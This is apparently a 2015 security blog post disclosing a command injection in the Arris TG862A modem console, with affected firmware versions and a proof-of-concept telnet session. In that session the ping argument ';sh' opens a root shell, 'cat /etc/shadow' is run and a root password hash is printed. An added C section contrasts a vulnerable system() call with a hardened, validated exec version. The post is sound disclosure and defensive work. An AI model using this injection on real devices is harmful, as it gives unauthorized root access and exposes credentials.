m0nad's Blog


Command injection in Arris modems


Inspired by Bernardo Rodrigues' publication for the NullByte Conference on his blog (http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) about some command injections (backdoors?) in the restricted shell of Arris modems, I decided to publish another command injection that he may not have noticed, in the 'ping' feature.

Arris TG862A Command Injection
--
The Arris TG862A has a console (ARRIS Console) which, within the "System"
context, has a command injection in the ping feature. The password for
the ARRIS Console is the "password of the day".

Version affected
--
Hardware Model:         TG862A
Firmware Name:          TS0705125_062314_MODEL_862_GW
Firmware Revision:      7.5.125
Base Version:           2.0.5.38

PoC
--
```
$ telnet 192.168.100.1
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.



                           `!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::~
                               ``!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM!:~` ~   
                                    !MMMMMMMMMMMMMMMMMMMMMMM!:`     :~~     
                                     :MMMMMMMMMMMMMMMM!~        :~~~~       
                                   .:MMMMMMMMMM!:~           ~~~~~~         
                              ..:MMMMMMM!:~`             :~~~~~~~           
                         .:MMMMMM:~`                ::~~~~~~~~~             
                    .:MMMMM:~                    .!!!!!!: ~~~~              
              ..:MMM:~`                         .!!!!`      ~               
        ..:MM:~`                                !!`                         
   .:M:~` 


        AA              RRRRRRR          RRRRRRR          III         SSSSS  
       AAAA             RRRRRRRRR        RRRRRRRRR        III       SSSSSSSSS
      AAAAAA            RRR    RRR       RRR    RRR       III      SSS    SS 
     AAA  AAA           RRR   RRRR       RRR   RRRR       III       SSSS     
    AAA    AAA          RRRRRRRRR        RRRRRRRRR        III         SSSSSS 
   AAAAAAAAAAAA         RRR  RRR         RRR  RRR         III            SSSS
  AAA        AAA        RRR   RRR        RRR   RRR        III       SS    SSS
 AA            AA       RRR    RRR       RRR    RRR       III      SSSSSSSSS 
A                A      RRR       R      RRR       R      III        SSSSS   


          ARRIS Enterprises, Inc. 2014 All rights reserved




Enter password> 

Spawning ARRIS Console

Firmware Revision:      7.5.125
[  1] Console> system
[  2] System> ping ;sh
ping -I wan0 ;sh 
BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary

Usage: ping [OPTIONS] HOST



BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/shadow
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::
# 
```
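Added example, not code from the original post or from Arris: a C reconstruction of the likely root cause and its fix. `ping_vulnerable` is an assumed version of the console code that builds a shell command string (which is why `;sh` is parsed as a second command above), while `ping_hardened` validates the host and execs ping with a fixed argv and no shell; the `-c 4` count is an addition so the call returns.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed root cause (not the real console source): the argument is
 * pasted into a shell command line, so ";sh" terminates ping and the
 * rest is run by /bin/sh -c as a second command. For contrast only. */
void ping_vulnerable(const char *host) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "ping -I wan0 %s", host);
    system(cmd);
}

/* Accept only characters a hostname or IP literal can contain, and
 * refuse a leading '-' so the value cannot be parsed as a ping option. */
int is_valid_host(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':')
            return 0;
    }
    return 1;
}

/* Hardened form: validate, then exec ping directly with a fixed argv.
 * No shell parses the line, so ';', '|', '`', '$' are never interpreted.
 * Returns ping's exit status, or -1 if the host is rejected or exec fails. */
int ping_hardened(const char *host) {
    if (!is_valid_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-I", "wan0", "-c", "4", host, (char *)NULL);
        _exit(127);                          /* exec failed in the child */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Rejected input never reaches fork/exec, so `ping_hardened(";sh")` returns -1 before any process is spawned.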

Credits
--
Victor N. Ramos Mello <victornrm () gmail com>

Note: this bug is still active in the TS0705125D_031115_MODEL_862_GW firmware.


Written by m0nad

November 20, 2015 at 6:13 pm

Posted in Uncategorized


  1. […] lawyers will probably disagree). On the occasion of its publication, another researcher came forward who shared an extremely sophisticated privilege escalation technique in a restricted shell. In short, it looks […]
